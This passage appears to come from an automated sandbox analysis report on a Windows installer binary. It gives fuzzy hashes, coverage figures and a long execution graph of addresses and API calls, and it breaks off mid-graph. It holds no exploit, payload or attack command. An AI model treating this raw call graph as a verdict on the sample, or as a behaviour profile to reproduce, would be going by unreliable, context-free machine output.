            • Opcode Fuzzy Hash: 6db9315cda77603ae6b6e879c7adefdf1762131a3815c6aa2659d402f6a5b4f4
            • Instruction Fuzzy Hash: C2F0E9775441216ACF317734FD4D8572328CAE13653164037F906E73C1F6B88D8182E9
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:12%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0%
            Total number of Nodes:1217
            Total number of Limit Nodes:23
            execution_graph 2618 401dc1 2630 4029f6 2618->2630 2621 4029f6 18 API calls 2622 401dd0 2621->2622 2623 4029f6 18 API calls 2622->2623 2624 401dd9 2623->2624 2625 4029f6 18 API calls 2624->2625 2626 401de2 2625->2626 2636 401423 2626->2636 2629 401e16 2631 402a02 2630->2631 2639 405a2e 2631->2639 2634 401dc7 2634->2621 2679 404daa 2636->2679 2651 405a3b 2639->2651 2640 405c55 2641 402a23 2640->2641 2674 405a0c lstrcpynA 2640->2674 2641->2634 2658 405c6e 2641->2658 2643 405ad3 GetVersion 2650 405ae0 2643->2650 2644 405c2c lstrlenA 2644->2651 2647 405a2e 10 API calls 2647->2644 2649 405b4b GetSystemDirectoryA 2649->2650 2650->2649 2650->2651 2652 405b5e GetWindowsDirectoryA 2650->2652 2654 405a2e 10 API calls 2650->2654 2655 405bd5 lstrcatA 2650->2655 2656 405b92 SHGetSpecialFolderLocation 2650->2656 2667 4058f3 RegOpenKeyExA 2650->2667 2651->2640 2651->2643 2651->2644 2651->2647 2653 405c6e 5 API calls 2651->2653 2672 40596a wsprintfA 2651->2672 2673 405a0c lstrcpynA 2651->2673 2652->2650 2653->2651 2654->2650 2655->2651 2656->2650 2657 405baa SHGetPathFromIDListA CoTaskMemFree 2656->2657 2657->2650 2664 405c7a 2658->2664 2659 405ce6 CharPrevA 2662 405ce2 2659->2662 2660 405cd7 CharNextA 2660->2662 2660->2664 2662->2659 2663 405d01 2662->2663 2663->2634 2664->2660 2664->2662 2665 405cc5 CharNextA 2664->2665 2666 405cd2 CharNextA 2664->2666 2675 40552a 2664->2675 2665->2664 2666->2660 2668 405964 2667->2668 2669 405926 RegQueryValueExA 2667->2669 2668->2650 2670 405947 RegCloseKey 2669->2670 2670->2668 2672->2651 2673->2651 2674->2641 2676 405530 2675->2676 2677 405543 2676->2677 2678 405536 CharNextA 2676->2678 2677->2664 2678->2676 2680 404dc5 2679->2680 2689 401431 ShellExecuteA 2679->2689 2681 404de2 lstrlenA 2680->2681 2682 405a2e 18 API calls 2680->2682 2683 404df0 lstrlenA 2681->2683 2684 404e0b 2681->2684 2682->2681 2685 404e02 lstrcatA 2683->2685 2683->2689 2686 404e11 SetWindowTextA 2684->2686 2687 404e1e 2684->2687 2685->2684 2686->2687 2688 404e24 SendMessageA SendMessageA SendMessageA 2687->2688 2687->2689 2688->2689 2689->2629 3164 401cc1 GetDlgItem GetClientRect 3165 4029f6 18 API calls 3164->3165 3166 401cf1 LoadImageA SendMessageA 3165->3166 3167 40288b 3166->3167 3168 401d0f DeleteObject 3166->3168 3168->3167 3169 401645 3170 4029f6 18 API calls 3169->3170 3171 40164c 3170->3171 3172 4029f6 18 API calls 3171->3172 3173 401655 3172->3173 3174 4029f6 18 API calls 3173->3174 3175 40165e MoveFileA 3174->3175 3176 401671 3175->3176 3177 40166a 3175->3177 3178 405d07 2 API calls 3176->3178 3181 402169 3176->3181 3179 401423 25 API calls 3177->3179 3180 401680 3178->3180 3179->3181 3180->3181 3182 40575a 38 API calls 3180->3182 3182->3177 3183 401ec5 3184 4029f6 18 API calls 3183->3184 3185 401ecc GetFileVersionInfoSizeA 3184->3185 3186 401eef GlobalAlloc 3185->3186 3193 401f45 3185->3193 3187 401f03 GetFileVersionInfoA 3186->3187 3186->3193 3188 401f14 VerQueryValueA 3187->3188 3187->3193 3189 401f2d 3188->3189 3188->3193 3194 40596a wsprintfA 3189->3194 3191 401f39 3195 40596a wsprintfA 3191->3195 3194->3191 3195->3193 3196 4014ca 3197 404daa 25 API calls 3196->3197 3198 4014d1 3197->3198 3199 4025cc 3200 4025d3 3199->3200 3206 402838 3199->3206 3207 4029d9 3200->3207 3202 4025de 3203 4025e5 SetFilePointer 3202->3203 3204 4025f5 3203->3204 3203->3206 3210 40596a wsprintfA 3204->3210 3208 405a2e 18 API calls 3207->3208 3209 4029ed 3208->3209 3209->3202 3210->3206 3211 401f51 3212 401f63 3211->3212 3213 402012 3211->3213 3214 4029f6 18 API calls 3212->3214 3216 401423 25 API calls 3213->3216 3215 401f6a 3214->3215 3217 4029f6 18 API calls 3215->3217 3221 402169 3216->3221 3218 401f73 3217->3218 3219 401f88 LoadLibraryExA 3218->3219 3220 401f7b GetModuleHandleA 3218->3220 3219->3213 3222 401f98 GetProcAddress 3219->3222 3220->3219 3220->3222 3223 401fe5 3222->3223 3224 401fa8 3222->3224 3225 404daa 25 API calls 3223->3225 3226 401423 25 API calls 3224->3226 3227 401fb8 3224->3227 3225->3227 3226->3227 3227->3221 3228 402006 FreeLibrary 3227->3228 3228->3221 3229 403ed2 lstrcpynA lstrlenA 3230 4014d6 3231 4029d9 18 API calls 3230->3231 3232 4014dc Sleep 3231->3232 3234 40288b 3232->3234 3240 4018d8 3241 40190f 3240->3241 3242 4029f6 18 API calls 3241->3242 3243 401914 3242->3243 3244 405331 68 API calls 3243->3244 3245 40191d 3244->3245 3246 4018db 3247 4029f6 18 API calls 3246->3247 3248 4018e2 3247->3248 3249 4052cd MessageBoxIndirectA 3248->3249 3250 4018eb 3249->3250 3251 401ae5 3252 4029f6 18 API calls 3251->3252 3253 401aec 3252->3253 3254 4029d9 18 API calls 3253->3254 3255 401af5 wsprintfA 3254->3255 3256 40288b 3255->3256 3257 402866 SendMessageA 3258 402880 InvalidateRect 3257->3258 3259 40288b 3257->3259 3258->3259 3260 4019e6 3261 4029f6 18 API calls 3260->3261 3262 4019ef ExpandEnvironmentStringsA 3261->3262 3263 401a03 3262->3263 3265 401a16 3262->3265 3264 401a08 lstrcmpA 3263->3264 3263->3265 3264->3265 3266 402267 3267 4029f6 18 API calls 3266->3267 3268 402275 3267->3268 3269 4029f6 18 API calls 3268->3269 3270 40227e 3269->3270 3271 4029f6 18 API calls 3270->3271 3272 402288 GetPrivateProfileStringA 3271->3272 3273 404ee8 3274 405094 3273->3274 3275 404f09 GetDlgItem GetDlgItem GetDlgItem 3273->3275 3276 4050c5 3274->3276 3277 40509d GetDlgItem CreateThread CloseHandle 3274->3277 3319 403df3 SendMessageA 3275->3319 3279 4050f0 3276->3279 3281 405112 3276->3281 3282 4050dc ShowWindow ShowWindow 3276->3282 3277->3276 3283 40514e 3279->3283 3286 405101 3279->3286 3287 405127 ShowWindow 3279->3287 3280 404f7a 3284 404f81 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3280->3284 3328 403e25 3281->3328 3324 403df3 SendMessageA 3282->3324 3283->3281 3291 405159 SendMessageA 3283->3291 3289 404ff0 3284->3289 3290 404fd4 SendMessageA SendMessageA 3284->3290 3325 403d97 3286->3325 3294 405147 3287->3294 3295 405139 3287->3295 3297 405003 3289->3297 3298 404ff5 SendMessageA 3289->3298 3290->3289 3293 405120 3291->3293 3299 405172 CreatePopupMenu 3291->3299 3296 403d97 SendMessageA 3294->3296 3300 404daa 25 API calls 3295->3300 3296->3283 3320 403dbe 3297->3320 3298->3297 3301 405a2e 18 API calls 3299->3301 3300->3294 3303 405182 AppendMenuA 3301->3303 3305 405195 GetWindowRect 3303->3305 3306 4051a8 3303->3306 3304 405013 3307 405050 GetDlgItem SendMessageA 3304->3307 3308 40501c ShowWindow 3304->3308 3309 4051b1 TrackPopupMenu 3305->3309 3306->3309 3307->3293 3312 405077 SendMessageA SendMessageA 3307->3312 3310 405032 ShowWindow 3308->3310 3311 40503f 3308->3311 3309->3293 3313 4051cf 3309->3313 3310->3311 3323 403df3 SendMessageA 3311->3323 3312->3293 3314 4051eb SendMessageA 3313->3314 3314->3314 3316 405208 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3314->3316 3317 40522a SendMessageA 3316->3317 3317->3317 3318 40524b GlobalUnlock SetClipboardData CloseClipboard 3317->3318 3318->3293 3319->3280 3321 405a2e 18 API calls 3320->3321 3322 403dc9 SetDlgItemTextA 3321->3322 3322->3304 3323->3307 3324->3279 3326 403da4 SendMessageA 3325->3326 3327 403d9e 3325->3327 3326->3281 3327->3326 3329 403e3d GetWindowLongA 3328->3329 3339 403ec6 3328->3339 3330 403e4e 3329->3330 3329->3339 3331 403e60 3330->3331 3332 403e5d GetSysColor 3330->3332 3333 403e70 SetBkMode 3331->3333 3334 403e66 SetTextColor 3331->3334 3332->3331 3335 403e88 GetSysColor 3333->3335 3336 403e8e 3333->3336 3334->3333 3335->3336 3337 403e95 SetBkColor 3336->3337 3338 403e9f 3336->3338 3337->3338 3338->3339 3340 403eb2 DeleteObject 3338->3340 3341 403eb9 CreateBrushIndirect 3338->3341 3339->3293 3340->3341 3341->3339 3342 4038eb 3343 403903 3342->3343 3344 403a3e 3342->3344 3343->3344 3345 40390f 3343->3345 3346 403a8f 3344->3346 3347 403a4f GetDlgItem GetDlgItem 3344->3347 3348 40391a SetWindowPos 3345->3348 3349 40392d 3345->3349 3351 403ae9 3346->3351 3359 401389 2 API calls 3346->3359 3350 403dbe 19 API calls 3347->3350 3348->3349 3353 403932 ShowWindow 3349->3353 3354 40394a 3349->3354 3355 403a79 SetClassLongA 3350->3355 3352 403e0a SendMessageA 3351->3352 3402 403a39 3351->3402 3400 403afb 3352->3400 3353->3354 3356 403952 DestroyWindow 3354->3356 3357 40396c 3354->3357 3358 40140b 2 API calls 3355->3358 3363 403d47 3356->3363 3360 403971 SetWindowLongA 3357->3360 3361 403982 3357->3361 3358->3346 3362 403ac1 3359->3362 3360->3402 3366 4039f9 3361->3366 3367 40398e GetDlgItem 3361->3367 3362->3351 3368 403ac5 SendMessageA 3362->3368 3370 403d78 ShowWindow 3363->3370 3363->3402 3364 40140b 2 API calls 3364->3400 3365 403d49 DestroyWindow EndDialog 3365->3363 3369 403e25 8 API calls 3366->3369 3371 4039a1 SendMessageA IsWindowEnabled 3367->3371 3372 4039be 3367->3372 3368->3402 3369->3402 3370->3402 3371->3372 3371->3402 3374 4039cb 3372->3374 3375 403a12 SendMessageA 3372->3375 3376 4039de 3372->3376 3383 4039c3 3372->3383 3373 405a2e 18 API calls 3373->3400 3374->3375 3374->3383 3375->3366 3378 4039e6 3376->3378 3379 4039fb 3376->3379 3377 403d97 SendMessageA 3377->3366 3380 40140b 2 API calls 3378->3380 3381 40140b 2 API calls 3379->3381 3380->3383 3381->3383 3382 403dbe 19 API calls 3382->3400 3383->3366 3383->3377 3384 403dbe 19 API calls 3385 403b76 GetDlgItem 3384->3385 3386 403b93 ShowWindow EnableWindow 3385->3386 3387 403b8b 3385->3387 3410 403de0 EnableWindow 3386->3410 3387->3386 3389 403bbd EnableWindow 3392 403bd1 3389->3392 3390 403bd6 GetSystemMenu EnableMenuItem SendMessageA 3391 403c06 SendMessageA 3390->3391 3390->3392 3391->3392 3392->3390 3411 403df3 SendMessageA 3392->3411 3412 405a0c lstrcpynA 3392->3412 3395 403c34 lstrlenA 3396 405a2e 18 API calls 3395->3396 3397 403c45 SetWindowTextA 3396->3397 3398 401389 2 API calls 3397->3398 3398->3400 3399 403c89 DestroyWindow 3399->3363 3401 403ca3 CreateDialogParamA 3399->3401 3400->3364 3400->3365 3400->3373 3400->3382 3400->3384 3400->3399 3400->3402 3401->3363 3403 403cd6 3401->3403 3404 403dbe 19 API calls 3403->3404 3405 403ce1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3404->3405 3406 401389 2 API calls 3405->3406 3407 403d27 3406->3407 3407->3402 3408 403d2f ShowWindow 3407->3408 3409 403e0a SendMessageA 3408->3409 3409->3363 3410->3389 3411->3392 3412->3395 3413 401c6d 3414 4029d9 18 API calls 3413->3414 3415 401c73 IsWindow 3414->3415 3416 4019d6 3415->3416 3417 4014f0 SetForegroundWindow 3418 40288b 3417->3418 3419 402172 3420 4029f6 18 API calls 3419->3420 3421 402178 3420->3421 3422 4029f6 18 API calls 3421->3422 3423 402181 3422->3423 3424 4029f6 18 API calls 3423->3424 3425 40218a 3424->3425 3426 405d07 2 API calls 3425->3426 3427 402193 3426->3427 3428 4021a4 lstrlenA lstrlenA 3427->3428 3432 402197 3427->3432 3430 404daa 25 API calls 3428->3430 3429 404daa 25 API calls 3433 40219f 3429->3433 3431 4021e0 SHFileOperationA 3430->3431 3431->3432 3431->3433 3432->3429 3432->3433 3434 4021f4 3435 4021fb 3434->3435 3438 40220e 3434->3438 3436 405a2e 18 API calls 3435->3436 3437 402208 3436->3437 3439 4052cd MessageBoxIndirectA 3437->3439 3439->3438 3440 4046f9 GetDlgItem GetDlgItem 3441 40474d 7 API calls 3440->3441 3453 40496a 3440->3453 3442 4047f3 DeleteObject 3441->3442 3443 4047e6 SendMessageA 3441->3443 3444 4047fe 3442->3444 3443->3442 3446 404835 3444->3446 3447 405a2e 18 API calls 3444->3447 3445 404a54 3449 404b03 3445->3449 3455 40495d 3445->3455 3460 404aad SendMessageA 3445->3460 3448 403dbe 19 API calls 3446->3448 3450 404817 SendMessageA SendMessageA 3447->3450 3454 404849 3448->3454 3451 404b18 3449->3451 3452 404b0c SendMessageA 3449->3452 3450->3444 3462 404b31 3451->3462 3463 404b2a ImageList_Destroy 3451->3463 3470 404b41 3451->3470 3452->3451 3453->3445 3474 4049de 3453->3474 3493 404679 SendMessageA 3453->3493 3459 403dbe 19 API calls 3454->3459 3456 403e25 8 API calls 3455->3456 3461 404cf3 3456->3461 3457 404a46 SendMessageA 3457->3445 3475 404857 3459->3475 3460->3455 3465 404ac2 SendMessageA 3460->3465 3466 404b3a GlobalFree 3462->3466 3462->3470 3463->3462 3464 404ca7 3464->3455 3471 404cb9 ShowWindow GetDlgItem ShowWindow 3464->3471 3468 404ad5 3465->3468 3466->3470 3467 40492b GetWindowLongA SetWindowLongA 3469 404944 3467->3469 3477 404ae6 SendMessageA 3468->3477 3472 404962 3469->3472 3473 40494a ShowWindow 3469->3473 3470->3464 3476 40140b 2 API calls 3470->3476 3487 404b73 3470->3487 3471->3455 3492 403df3 SendMessageA 3472->3492 3491 403df3 SendMessageA 3473->3491 3474->3445 3474->3457 3475->3467 3478 404925 3475->3478 3481 4048a6 SendMessageA 3475->3481 3482 4048e2 SendMessageA 3475->3482 3483 4048f3 SendMessageA 3475->3483 3476->3487 3477->3449 3478->3467 3478->3469 3481->3475 3482->3475 3483->3475 3484 404c7d InvalidateRect 3484->3464 3485 404c93 3484->3485 3498 404597 3485->3498 3486 404ba1 SendMessageA 3488 404bb7 3486->3488 3487->3486 3487->3488 3488->3484 3490 404c2b SendMessageA SendMessageA 3488->3490 3490->3488 3491->3455 3492->3453 3494 4046d8 SendMessageA 3493->3494 3495 40469c GetMessagePos ScreenToClient SendMessageA 3493->3495 3497 4046d0 3494->3497 3496 4046d5 3495->3496 3495->3497 3496->3494 3497->3474 3499 4045b1 3498->3499 3500 405a2e 18 API calls 3499->3500 3501 4045e6 3500->3501 3502 405a2e 18 API calls 3501->3502 3503 4045f1 3502->3503 3504 405a2e 18 API calls 3503->3504 3505 404622 lstrlenA wsprintfA SetDlgItemTextA 3504->3505 3505->3464 2812 4030fa #17 SetErrorMode OleInitialize 2882 405d2e GetModuleHandleA 2812->2882 2816 403168 GetCommandLineA 2887 405a0c lstrcpynA 2816->2887 2818 40317a GetModuleHandleA 2819 403191 2818->2819 2820 40552a CharNextA 2819->2820 2821 4031a5 CharNextA 2820->2821 2826 4031b2 2821->2826 2822 40321b 2823 40322e GetTempPathA 2822->2823 2888 4030c6 2823->2888 2825 403244 2827 403268 DeleteFileA 2825->2827 2828 403248 GetWindowsDirectoryA lstrcatA 2825->2828 2826->2822 2829 40552a CharNextA 2826->2829 2833 40321d 2826->2833 2896 402c22 GetTickCount GetModuleFileNameA 2827->2896 2830 4030c6 11 API calls 2828->2830 2829->2826 2832 403264 2830->2832 2832->2827 2836 4032e6 ExitProcess OleUninitialize 2832->2836 2924 405a0c lstrcpynA 2833->2924 2834 403279 2834->2836 2837 4032d2 2834->2837 2843 40552a CharNextA 2834->2843 2838 4033e0 2836->2838 2839 4032fb 2836->2839 2941 403555 2837->2941 2841 403463 ExitProcess 2838->2841 2845 405d2e 3 API calls 2838->2845 2840 4052cd MessageBoxIndirectA 2839->2840 2844 403309 ExitProcess 2840->2844 2848 403290 2843->2848 2849 4033ef 2845->2849 2846 4032e2 2846->2836 2851 403311 lstrcatA lstrcmpiA 2848->2851 2852 4032ad 2848->2852 2850 405d2e 3 API calls 2849->2850 2853 4033f8 2850->2853 2851->2836 2854 40332d CreateDirectoryA SetCurrentDirectoryA 2851->2854 2925 4055e0 2852->2925 2856 405d2e 3 API calls 2853->2856 2858 403344 2854->2858 2859 40334f 2854->2859 2857 403401 2856->2857 2861 40344f ExitWindowsEx 2857->2861 2867 40340f GetCurrentProcess 2857->2867 2995 405a0c lstrcpynA 2858->2995 2996 405a0c lstrcpynA 2859->2996 2861->2841 2866 40345c 2861->2866 2863 4032bc 2939 405a0c lstrcpynA 2863->2939 3026 40140b 2866->3026 2872 40341f 2867->2872 2868 4032c7 2940 405a0c lstrcpynA 2868->2940 2871 405a2e 18 API calls 2873 40337f DeleteFileA 2871->2873 2872->2861 2874 40338c CopyFileA 2873->2874 2879 40335d 2873->2879 2874->2879 2875 4033d4 2876 40575a 38 API calls 2875->2876 2876->2846 2878 405a2e 18 API calls 2878->2879 2879->2871 2879->2875 2879->2878 2881 4033c0 CloseHandle 2879->2881 2997 40575a 2879->2997 3023 40526c CreateProcessA 2879->3023 2881->2879 2883 405d55 GetProcAddress 2882->2883 2884 405d4a LoadLibraryA 2882->2884 2885 40313d SHGetFileInfoA 2883->2885 2884->2883 2884->2885 2886 405a0c lstrcpynA 2885->2886 2886->2816 2887->2818 2889 405c6e 5 API calls 2888->2889 2890 4030d2 2889->2890 2891 4030dc 2890->2891 2892 4054ff 3 API calls 2890->2892 2891->2825 2893 4030e4 CreateDirectoryA 2892->2893 2894 405712 2 API calls 2893->2894 2895 4030f8 2894->2895 2895->2825 3029 4056e3 GetFileAttributesA CreateFileA 2896->3029 2898 402c62 2919 402c72 2898->2919 3030 405a0c lstrcpynA 2898->3030 2900 402c88 3031 405546 lstrlenA 2900->3031 2904 402c99 GetFileSize 2905 402d95 2904->2905 2917 402cb0 2904->2917 3036 402bbe 2905->3036 2907 402d9e 2909 402dce GlobalAlloc 2907->2909 2907->2919 3048 4030af SetFilePointer 2907->3048 2908 40307d ReadFile 2908->2917 3047 4030af SetFilePointer 2909->3047 2911 402e01 2915 402bbe 6 API calls 2911->2915 2913 402db7 2916 40307d ReadFile 2913->2916 2914 402de9 2918 402e5b 33 API calls 2914->2918 2915->2919 2920 402dc2 2916->2920 2917->2905 2917->2908 2917->2911 2917->2919 2921 402bbe 6 API calls 2917->2921 2922 402df5 2918->2922 2919->2834 2920->2909 2920->2919 2921->2917 2922->2919 2922->2922 2923 402e32 SetFilePointer 2922->2923 2923->2919 2924->2823 3053 405a0c lstrcpynA 2925->3053 2927 4055f1 2928 405593 4 API calls 2927->2928 2929 4055f7 2928->2929 2930 4032b8 2929->2930 2931 405c6e 5 API calls 2929->2931 2930->2836 2930->2863 2937 405607 2931->2937 2932 405632 lstrlenA 2933 40563d 2932->2933 2932->2937 2935 4054ff 3 API calls 2933->2935 2934 405d07 2 API calls 2934->2937 2936 405642 GetFileAttributesA 2935->2936 2936->2930 2937->2930 2937->2932 2937->2934 2938 405546 2 API calls 2937->2938 2938->2932 2939->2868 2940->2837 2942 405d2e 3 API calls 2941->2942 2943 403569 2942->2943 2944 403581 2943->2944 2945 40356f 2943->2945 2946 4058f3 3 API calls 2944->2946 3054 40596a wsprintfA 2945->3054 2947 4035a2 2946->2947 2949 4035c0 lstrcatA 2947->2949 2951 4058f3 3 API calls 2947->2951 2950 40357f 2949->2950 3055 40381e 2950->3055 2951->2949 2954 4055e0 18 API calls 2955 4035f2 2954->2955 2956 40367b 2955->2956 2958 4058f3 3 API calls 2955->2958 2957 4055e0 18 API calls 2956->2957 2959 403681 2957->2959 2960 40361e 2958->2960 2961 403691 LoadImageA 2959->2961 2962 405a2e 18 API calls 2959->2962 2960->2956 2965 40363a lstrlenA 2960->2965 2969 40552a CharNextA 2960->2969 2963 403745 2961->2963 2964 4036bc RegisterClassA 2961->2964 2962->2961 2968 40140b 2 API calls 2963->2968 2966 40374f 2964->2966 2967 4036f8 SystemParametersInfoA CreateWindowExA 2964->2967 2970 403648 lstrcmpiA 2965->2970 2971 40366e 2965->2971 2966->2846 2967->2963 2972 40374b 2968->2972 2974 403638 2969->2974 2970->2971 2975 403658 GetFileAttributesA 2970->2975 2973 4054ff 3 API calls 2971->2973 2972->2966 2976 40381e 19 API calls 2972->2976 2977 403674 2973->2977 2974->2965 2978 403664 2975->2978 2979 40375c 2976->2979 3064 405a0c lstrcpynA 2977->3064 2978->2971 2981 405546 2 API calls 2978->2981 2982 403768 ShowWindow LoadLibraryA 2979->2982 2983 4037eb 2979->2983 2981->2971 2984 403787 LoadLibraryA 2982->2984 2985 40378e GetClassInfoA 2982->2985 3065 404e7c OleInitialize 2983->3065 2984->2985 2987 4037a2 GetClassInfoA RegisterClassA 2985->2987 2988 4037b8 DialogBoxParamA 2985->2988 2987->2988 2990 40140b 2 API calls 2988->2990 2989 4037f1 2991 40380d 2989->2991 2993 4037f5 2989->2993 2990->2966 2992 40140b 2 API calls 2991->2992 2992->2966 2993->2966 2994 40140b 2 API calls 2993->2994 2994->2966 2995->2859 2996->2879 2998 405d2e 3 API calls 2997->2998 2999 405765 2998->2999 3000 4057c2 GetShortPathNameA 2999->3000 3003 4058b7 2999->3003 3080 4056e3 GetFileAttributesA CreateFileA 2999->3080 3002 4057d7 3000->3002 3000->3003 3002->3003 3005 4057df wsprintfA 3002->3005 3003->2879 3004 4057a6 CloseHandle GetShortPathNameA 3004->3003 3006 4057ba 3004->3006 3007 405a2e 18 API calls 3005->3007 3006->3000 3006->3003 3008 405807 3007->3008 3081 4056e3 GetFileAttributesA CreateFileA 3008->3081 3010 405814 3010->3003 3011 405823 GetFileSize GlobalAlloc 3010->3011 3012 4058b0 CloseHandle 3011->3012 3013 405841 ReadFile 3011->3013 3012->3003 3013->3012 3014 405855 3013->3014 3014->3012 3082 405658 lstrlenA 3014->3082 3017 4058c4 3020 405658 4 API calls 3017->3020 3018 40586a 3087 405a0c lstrcpynA 3018->3087 3021 405878 3020->3021 3022 40588b SetFilePointer WriteFile GlobalFree 3021->3022 3022->3012 3024 4052a7 3023->3024 3025 40529b CloseHandle 3023->3025 3024->2879 3025->3024 3027 401389 2 API calls 3026->3027 3028 401420 3027->3028 3028->2841 3029->2898 3030->2900 3032 405553 3031->3032 3033 402c8e 3032->3033 3034 405558 CharPrevA 3032->3034 3035 405a0c lstrcpynA 3033->3035 3034->3032 3034->3033 3035->2904 3037 402bc7 3036->3037 3038 402bdf 3036->3038 3039 402bd0 DestroyWindow 3037->3039 3040 402bd7 3037->3040 3041 402be7 3038->3041 3042 402bef GetTickCount 3038->3042 3039->3040 3040->2907 3049 405d67 3041->3049 3044 402c20 3042->3044 3045 402bfd CreateDialogParamA ShowWindow 3042->3045 3044->2907 3045->3044 3047->2914 3048->2913 3050 405d84 PeekMessageA 3049->3050 3051 402bed 3050->3051 3052 405d7a DispatchMessageA 3050->3052 3051->2907 3052->3050 3053->2927 3054->2950 3056 403832 3055->3056 3072 40596a wsprintfA 3056->3072 3058 4038a3 3059 405a2e 18 API calls 3058->3059 3060 4038af SetWindowTextA 3059->3060 3061 4035d0 3060->3061 3062 4038cb 3060->3062 3061->2954 3062->3061 3063 405a2e 18 API calls 3062->3063 3063->3062 3064->2956 3073 403e0a 3065->3073 3067 404e9f 3071 404ec6 3067->3071 3076 401389 3067->3076 3068 403e0a SendMessageA 3069 404ed8 OleUninitialize 3068->3069 3069->2989 3071->3068 3072->3058 3074 403e22 3073->3074 3075 403e13 SendMessageA 3073->3075 3074->3067 3075->3074 3078 401390 3076->3078 3077 4013fe 3077->3067 3078->3077 3079 4013cb MulDiv SendMessageA 3078->3079 3079->3078 3080->3004 3081->3010 3083 40568e lstrlenA 3082->3083 3084 405698 3083->3084 3085 40566c lstrcmpiA 3083->3085 3084->3017 3084->3018 3085->3084 3086 405685 CharNextA 3085->3086 3086->3083 3087->3021 3506 404cfa 3507 404d08 3506->3507 3508 404d1f 3506->3508 3509 404d0e 3507->3509 3524 404d88 3507->3524 3510 404d2d IsWindowVisible 3508->3510 3516 404d44 3508->3516 3511 403e0a SendMessageA 3509->3511 3513 404d3a 3510->3513 3510->3524 3514 404d18 3511->3514 3512 404d8e CallWindowProcA 3512->3514 3515 404679 5 API calls 3513->3515 3515->3516 3516->3512 3525 405a0c lstrcpynA 3516->3525 3518 404d73 3526 40596a wsprintfA 3518->3526 3520 404d7a 3521 40140b 2 API calls 3520->3521 3522 404d81 3521->3522 3527 405a0c lstrcpynA 3522->3527 3524->3512 3525->3518 3526->3520 3527->3524 3528 4016fa 3529 4029f6 18 API calls 3528->3529 3530 401701 SearchPathA 3529->3530 3531 40171c 3530->3531 3088 40347b 3089 403493 3088->3089 3090 403485 CloseHandle 3088->3090 3095 4034c0 3089->3095 3090->3089 3096 4034ce 3095->3096 3097 4034d3 FreeLibrary GlobalFree 3096->3097 3098 403498 3096->3098 3097->3097 3097->3098 3099 405331 3098->3099 3100 4055e0 18 API calls 3099->3100 3101 405345 3100->3101 3102 405365 3101->3102 3103 40534e DeleteFileA 3101->3103 3105 40549a 3102->3105 3140 405a0c lstrcpynA 3102->3140 3104 4034a4 3103->3104 3105->3104 3110 405d07 2 API calls 3105->3110 3107 40538f 3108 4053a0 3107->3108 3109 405393 lstrcatA 3107->3109 3112 405546 2 API calls 3108->3112 3111 4053a6 3109->3111 3114 4054bf 3110->3114 3113 4053b4 lstrcatA 3111->3113 3115 4053bf lstrlenA FindFirstFileA 3111->3115 3112->3111 3113->3115 3114->3104 3116 4054c3 3114->3116 3115->3105 3121 4053e3 3115->3121 3117 4054ff 3 API calls 3116->3117 3119 4054c9 3117->3119 3118 40552a CharNextA 3118->3121 3120 4056c4 2 API calls 3119->3120 3122 4054cf RemoveDirectoryA 3120->3122 3121->3118 3126 405479 FindNextFileA 3121->3126 3131 405435 3121->3131 3141 405a0c lstrcpynA 3121->3141 3123 4054f1 3122->3123 3124 4054da 3122->3124 3125 404daa 25 API calls 3123->3125 3124->3104 3129 404daa 25 API calls 3124->3129 3125->3104 3126->3121 3128 405491 FindClose 3126->3128 3128->3105 3130 4054e8 3129->3130 3132 40575a 38 API calls 3130->3132 3131->3126 3133 4056c4 2 API calls 3131->3133 3134 405331 59 API calls 3131->3134 3137 404daa 25 API calls 3131->3137 3138 404daa 25 API calls 3131->3138 3139 40575a 38 API calls 3131->3139 3135 4054ef 3132->3135 3136 405446 DeleteFileA 3133->3136 3134->3131 3135->3104 3136->3131 3137->3126 3138->3131 3139->3131 3140->3107 3141->3121 3532 4025fb 3533 402602 3532->3533 3534 40288b 3532->3534 3535 402608 FindClose 3533->3535 3535->3534 3536 40267c 3537 4029f6 18 API calls 3536->3537 3539 40268a 3537->3539 3538 4026a0 3541 4056c4 2 API calls 3538->3541 3539->3538 3540 4029f6 18 API calls 3539->3540 3540->3538 3542 4026a6 3541->3542 3562 4056e3 GetFileAttributesA CreateFileA 3542->3562 3544 4026b3 3545 40275c 3544->3545 3546 4026bf GlobalAlloc 3544->3546 3549 402764 DeleteFileA 3545->3549 3550 402777 3545->3550 3547 402753 CloseHandle 3546->3547 3548 4026d8 3546->3548 3547->3545 3563 4030af SetFilePointer 3548->3563 3549->3550 3552 4026de 3553 40307d ReadFile 3552->3553 3554 4026e7 GlobalAlloc 3553->3554 3555 4026f7 3554->3555 3556 40272b WriteFile GlobalFree 3554->3556 3557 402e5b 33 API calls 3555->3557 3558 402e5b 33 API calls 3556->3558 3561 402704 3557->3561 3559 402750 3558->3559 3559->3547 3560 402722 GlobalFree 3560->3556 3561->3560 3562->3544 3563->3552 3564 4041fc 3565 40423a 3564->3565 3566 40422d 3564->3566 3568 404243 GetDlgItem 3565->3568 3573 4042a6 3565->3573 3625 4052b1 GetDlgItemTextA 3566->3625 3570 404257 3568->3570 3569 404234 3572 405c6e 5 API calls 3569->3572 3575 40426b SetWindowTextA 3570->3575 3581 405593 4 API calls 3570->3581 3571 40438a 3576 404516 3571->3576 3627 4052b1 GetDlgItemTextA 3571->3627 3572->3565 3573->3571 3573->3576 3577 405a2e 18 API calls 3573->3577 3579 403dbe 19 API calls 3575->3579 3580 403e25 8 API calls 3576->3580 3582 40431c SHBrowseForFolderA 3577->3582 3578 4043b6 3583 4055e0 18 API calls 3578->3583 3584 404289 3579->3584 3585 40452a 3580->3585 3586 404261 3581->3586 3582->3571 3587 404334 CoTaskMemFree 3582->3587 3588 4043bc 3583->3588 3589 403dbe 19 API calls 3584->3589 3586->3575 3592 4054ff 3 API calls 3586->3592 3590 4054ff 3 API calls 3587->3590 3628 405a0c lstrcpynA 3588->3628 3591 404297 3589->3591 3593 404341 3590->3593 3626 403df3 SendMessageA 3591->3626 3592->3575 3596 404378 SetDlgItemTextA 3593->3596 3601 405a2e 18 API calls 3593->3601 3596->3571 3597 40429f 3599 405d2e 3 API calls 3597->3599 3598 4043d3 3600 405d2e 3 API calls 3598->3600 3599->3573 3608 4043db 3600->3608 3602 404360 lstrcmpiA 3601->3602 3602->3596 3605 404371 lstrcatA 3602->3605 3603 404415 3629 405a0c lstrcpynA 3603->3629 3605->3596 3606 40441e 3607 405593 4 API calls 3606->3607 3609 